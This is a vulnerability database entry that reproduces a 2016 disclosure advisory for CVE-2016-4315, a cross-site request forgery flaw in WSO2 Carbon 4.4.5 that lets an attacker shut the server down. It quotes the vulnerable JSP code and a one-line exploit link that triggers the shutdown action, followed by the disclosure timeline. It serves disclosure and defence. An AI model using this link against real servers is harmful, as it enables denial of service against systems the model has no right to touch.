Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHyp3rlinx1337DAY-ID-25256
HistoryAug 16, 2016 - 12:00 a.m.

WSO2 Carbon 4.4.5 - Denial of Service / Cross-Site Request Forgery

2016-08-1600:00:00
hyp3rlinx
0day.today
44

EPSS

0.014

Percentile

86.3%

JSON

Exploit for jsp platform in category web applications

[+] Credits: John Page aka HYP3RLINX
 
 
Vendor:
============
www.wso2.com
 
 
Product:
==================
Ws02Carbon v4.4.5
 
WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario.
 
 
Vulnerability Type:
=================================
Cross Site Request Forgery / DOS
 
 
CVE Reference:
==============
CVE-2016-4315
 
 
Vulnerability Details:
=====================
 
The attack involves tricking a privileged user to initiate a request by clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
 
 
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
 
 
The getSafeText() Function and conditional logic below processes the "action" parameter with no check for inbound CSRF attacks.
 
String cookie = (String) session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie, session);
 
try {   
if ("restart".equals(action)) {
    client.restart();
 } else if ("restartGracefully".equals(action)) {
   client.restartGracefully();
 } else if ("shutdown".equals(action)) {
     client.shutdown();
  } else if ("shutdownGracefully".equals(action)) {
      client.shutdownGracefully();
    }
 } catch (Exception e) {
  response.sendError(500, e.getMessage());
   return;
 }
 
 
 
Exploit code(s):
===============
       
Shutdown the Carbon server
 
<a href="https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown">Shut it down!</a>
 
 
Disclosure Timeline:
==========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure

#  0day.today [2018-02-19]  #

Related

exploitdb 1
cvelist 1
prion 1
exploitpack 1
nvd 1
cve 1
packetstorm 1
exploitdb
exploitdb
WSO2 Carbon 4.4.5 - Denial of Service / Cross-Site Request Forgery
2016-08-16 00:00:00
cvelist
cvelist
CVE-2016-4315
2017-02-16 18:00:00
prion
prion
Cross site request forgery (csrf)
2017-02-17 02:59:00
exploitpack
exploitpack
WSO2 Carbon 4.4.5 - Denial of Service Cross-Site Request Forgery
2016-08-16 00:00:00
nvd
nvd
CVE-2016-4315
2017-02-17 02:59:12
cve
cve
CVE-2016-4315
2017-02-17 02:59:12
packetstorm
packetstorm
WSO2 Carbon 4.4.5 Cross Site Request Forgery / Denial Of Service
2016-08-13 00:00:00

EPSS

0.014

Percentile

86.3%

JSON
Related for 1337DAY-ID-25256
exploitdb1cvelist1prion1exploitpack1nvd1cve1packetstorm1